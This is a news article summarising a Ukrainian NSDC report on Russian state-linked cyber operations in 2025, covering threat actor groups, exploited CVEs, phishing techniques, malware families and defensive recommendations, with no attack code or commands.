A comprehensive new intelligence report from Ukraine’s National Security and Defense Council (NSDC), shared with Cyber Security News, has documented the staggering scale of Russian state-sponsored cyber operations in 2025. CERT-UA recorded 5,927 cyber incidents — a 37.4% increase compared to 2024 — as Russian threat actors deployed an increasingly versatile toolkit targeting government bodies, defense organizations, energy infrastructure, and critical sectors across Ukraine and Europe.
The Main Threat Actor Clusters
The report identifies four primary Russian-linked threat actor clusters driving the bulk of the observed activity in 2025:
- UAC-0002 (Sandworm) — GRU-linked group known for large-scale destructive operations, wiper malware deployment, and critical infrastructure attacks
- UAC-0001 (APT28 / Fancy Bear) — GRU-affiliated espionage cluster focused on credential theft, data exfiltration, and long-term access maintenance
- UAC-0010 (Gamaredon / Armageddon) — FSB-affiliated group conducting persistent, high-volume spear-phishing campaigns against Ukrainian government and military targets
- UAC-0190 (Void Blizzard) — A newer cluster with a focused mandate against Ukrainian government and defense sector organizations
These groups do not operate as independent cybercriminals. They are instruments of a broader geopolitical strategy, running well-planned, persistent campaigns designed to support Russian military and intelligence objectives in the ongoing conflict.
RDP and VPN Exploitation
Remote Desktop Protocol (RDP) remained one of the most heavily abused initial access vectors throughout 2025. Groups including UAC-0238 exploited exposed RDP services to deliver ransomware variants — including X2anylock, Warlock, and LockBit 3.0 — directly into compromised environments. The persistence of internet-exposed RDP services across both government agencies and private organizations continues to provide attackers with reliable, low-effort entry points that require no user interaction to exploit.
VPN appliances were systematically targeted via multiple CVEs. Cisco ASA/AnyConnect vulnerabilities CVE-2025-20333 and CVE-2025-20362 were exploited, as were Fortinet appliance flaws CVE-2024-55591, CVE-2024-21762, and CVE-2025-24472. Successful VPN exploitation provides attackers with a direct, trusted tunnel into internal networks, bypassing perimeter defenses entirely and granting access indistinguishable from legitimate remote workers.
Supply Chain Compromises
Supply chain attacks added a particularly dangerous dimension to the 2025 threat landscape. Russian-linked actors targeted software update mechanisms, third-party IT service providers, and development tooling ecosystems to plant backdoors in trusted distribution channels — where organizational scrutiny and monitoring are typically far lower than for direct attack vectors.
Once embedded through supply chain access, groups deployed persistent malware families including Remcos RAT, DarkCrystal RAT, XWorm, and Lumma Stealer. Legacy Microsoft Office vulnerabilities — including the decade-old CVE-2017-11882 and CVE-2017-0199 — were also actively weaponized against organizations that have yet to patch them, demonstrating that historical vulnerabilities carry very real contemporary consequences when patch management is neglected. Additional exploited platforms included Roundcube (CVE-2024-42009, CVE-2025-49113), WinRAR (CVE-2025-6218), and 7-Zip (CVE-2025-0411).
Social Engineering Across Multiple Platforms
Social engineering remained among the most reliable methods for gaining initial access in 2025, with Russian actors deliberately expanding their phishing operations beyond traditional enterprise email into consumer messaging platforms.
Phishing lures were distributed through Microsoft O365, Roundcube, and Zimbra email systems as well as Signal, WhatsApp, and Telegram — a calculated strategy to reach targets on less-monitored channels. Novel techniques observed include ClickFix social engineering lures, fake CAPTCHA prompts designed to trick users into executing PowerShell commands, OAuth device-code phishing against Microsoft Teams, and App-Specific Password phishing targeting Google accounts. QR-code session hijacking via a method known as GhostPairing was also deployed, with fake Android APK files distributed outside of Google Play to infect mobile devices with CamelSpy spyware.
In at least one documented case, attackers purchased stolen credentials from darknet access brokers and used them to move directly into target environments — completely bypassing the phishing stage and compressing the time from initial access to active exploitation.
Post-Compromise Payloads and Objectives
After gaining initial access, Russian groups deployed a broad arsenal of post-compromise tools aligned with their operational objectives. Sandworm (UAC-0002) deployed destructive wiper malware including ZEROLOT and PathWiper in attacks aimed at causing maximum disruption to Ukrainian infrastructure. Long-running espionage tools such as HomeSteel and WreckSteel silently collected and exfiltrated sensitive data over extended periods. Living-off-the-Land techniques using built-in Windows tools — PowerShell, certutil, mshta.exe, and rundll32 — helped attackers blend into normal system activity and evade behavioral detection. Payloads were delivered via SVG, PNG, LNK, JavaScript, and HTA files, frequently hosted on legitimate services including Dropbox, Google Drive, and Cloudflare Tunnels to bypass network filtering.
Defensive Recommendations
The NSDC report outlines a set of prioritized defensive measures organizations should implement in response to the elevated Russian threat landscape:
- Enforce multi-factor authentication across all remote access solutions, email platforms, and administrative interfaces — including messaging apps used for work communications
- Adopt Zero Trust architecture principles: assume breach, verify every access request regardless of network location
- Deploy Protective DNS to block malicious command-and-control domains before connections are established
- Restrict RDP access to trusted IP ranges only and require VPN authentication before any RDP interface is accessible
- Maintain aggressive patch management for both recent and legacy vulnerabilities — decade-old Office flaws are still being actively exploited in 2025
- Monitor for anomalous use of built-in system tools (PowerShell, certutil, mshta.exe) that attackers repurpose in Living-off-the-Land campaigns
- Conduct regular staff security awareness training that explicitly covers social engineering via messaging apps and QR-code-based attack techniques
The 37.4% year-over-year increase in recorded incidents makes clear that Russian cyber operations are not plateauing — they are escalating in both volume and sophistication. Organizations operating in sectors that represent strategic targets for Russian intelligence must treat this as an active, ongoing threat and ensure their defensive posture reflects that reality.